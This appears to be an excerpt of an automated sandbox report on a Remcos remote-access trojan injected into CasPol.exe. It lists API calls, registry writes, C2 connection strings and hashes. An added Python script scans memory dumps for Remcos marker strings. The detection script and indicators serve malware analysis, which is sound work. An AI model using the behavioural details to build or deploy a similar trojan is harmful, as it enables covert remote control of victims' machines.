                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994 (unnamed auto-reset event, initially non-signaled)
                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7 (thread start routine at RVA 0x4B1D, i.e. 0x404B1D in this dump)
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                            • Opcode ID: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                            • Opcode Fuzzy Hash: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
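The two function blocks above recover configuration and status strings from the PE dumped at 0x400000 out of the CasPol.exe process (PID 12 in this analysis): "5.3.0 Pro", "override" and "pth_unenc" in the registry-reading function at 0x40E56A, and "KeepAlive | Enabled | Timeout: " in the thread-starting function at 0x404915. A practitioner confirming the family and version on another host wants to check a raw memory dump for the same markers. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it searches a dump for those strings in both ASCII and UTF-16LE (the report does not say which encoding the sample stores them in), reports offsets, and only returns a positive verdict when several independent markers are present. The marker list is copied from the report; the dump fragment in the script is constructed, and the two-marker threshold is an assumption.

```python
"""Scan a memory dump for the marker strings the sandbox report recovered.

Added example, not part of the Joe Sandbox report or of the analysed sample.
"""
import sys
from typing import Dict, List, Tuple

# Marker strings copied from the report's String ID / Strings entries.
MARKERS = [
    "5.3.0 Pro",
    "pth_unenc",
    "override",
    "KeepAlive | Enabled | Timeout: ",
]


def encodings(s: str) -> Dict[str, bytes]:
    """Both byte forms a Windows binary is likely to store a string in."""
    return {"ascii": s.encode("ascii"), "utf-16le": s.encode("utf-16-le")}


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset of needle in buf, including overlapping occurrences."""
    hits, start = [], 0
    while True:
        i = buf.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def scan(buf: bytes, markers: List[str] = MARKERS) -> Dict[str, List[Tuple[str, int]]]:
    """Return {marker: [(encoding, offset), ...]} for every marker found in buf."""
    found: Dict[str, List[Tuple[str, int]]] = {}
    for marker in markers:
        hits = [
            (enc, off)
            for enc, needle in encodings(marker).items()
            for off in find_all(buf, needle)
        ]
        if hits:
            found[marker] = sorted(hits, key=lambda h: h[1])
    return found


def looks_like_remcos(buf: bytes, min_markers: int = 2) -> bool:
    """Triage verdict (assumed threshold): require more than one marker so a
    lone version-like string does not produce a false positive."""
    return len(scan(buf)) >= min_markers


# Constructed dump fragment: the version string stored as ASCII and the
# keepalive string stored as UTF-16LE, with padding around both.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"5.3.0 Pro\x00"
    + b"\x90" * 8
    + "KeepAlive | Enabled | Timeout: ".encode("utf-16-le")
    + b"\x00" * 16
)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for marker, hits in scan(data).items():
        for enc, off in hits:
            print(f"0x{off:08x} {enc:9s} {marker!r}")
    verdict = "Remcos markers present" if looks_like_remcos(data) else "insufficient markers"
    print("verdict:", verdict)
```

Point it at a process dump (`python scan.py dump.bin`) to get marker offsets; the offsets are relative to the start of the file, so add the dump's base address (0x400000 for the region above) to translate them into virtual addresses that can be cross-referenced with the xrefs the report gives, such as 0040495C for the keepalive string.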
                                                                                                            APIs
                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C (dwProvType 00000001 = PROV_RSA_FULL, dwFlags F0000000 = CRYPT_VERIFYCONTEXT: an ephemeral context with no key container, the standard way to obtain OS randomness through CryptGenRandom)
                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1815803762-0
                                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                            • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                            • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                            APIs
                                                                                                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF (NameType 00000001 = ComputerNameDnsHostname)
                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Name$ComputerUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 4229901323-0
                                                                                                            • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                            • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                            • API String ID: 2830904901-3665108517
                                                                                                            • Opcode ID: 9f973e99dceb02221dab3848e7669c1ef5b46b8e7220309f811798ebb2d5fd13
                                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                            • Opcode Fuzzy Hash: 9f973e99dceb02221dab3848e7669c1ef5b46b8e7220309f811798ebb2d5fd13
                                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                            • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                            • API String ID: 524882891-2450167416
                                                                                                            • Opcode ID: 1dc3a93547332a1d08a66a24adf672adb5c65733396b5e32248b0304f3286437
                                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                            • Opcode Fuzzy Hash: 1dc3a93547332a1d08a66a24adf672adb5c65733396b5e32248b0304f3286437
                                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                            • API String ID: 994465650-2151626615
                                                                                                            • Opcode ID: 97530c22e8ac59ad4108418477dc87f58698bb5f1659eac08e909f9c40ed0378
                                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                            • Opcode Fuzzy Hash: 97530c22e8ac59ad4108418477dc87f58698bb5f1659eac08e909f9c40ed0378
                                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3658366068-0
                                                                                                            • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                            • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
APIs
• GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914

Control-flow Graph

APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
• StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-2070987746

Control-flow Graph
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: HgF$pth_unenc
• API String ID: 1818849710-3662775637

Control-flow Graph
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
• RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234

Control-flow Graph
APIs
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CreateErrorLastMutex
• String ID: (CG
• API String ID: 1925916568-4210230975

Control-flow Graph
APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNELBASE(?), ref: 0041255F
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

Control-flow Graph
APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
• RegCloseKey.KERNELBASE(?), ref: 00412500
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

Control-flow Graph
APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
• RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: _wcslen
• String ID: xAG
• API String ID: 176396367-2759412365

APIs
• _free.LIBCMT ref: 0044B9DF
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: AllocateHeap$_free
• String ID:
• API String ID: 1482568997-0

APIs
• socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
                                                                                                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                            APIs
                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                              • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 1170566393-0
                                                                                                            • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                            • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                            • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                            • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                            • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                            • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                            • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                            APIs
                                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Startup
                                                                                                            • String ID:
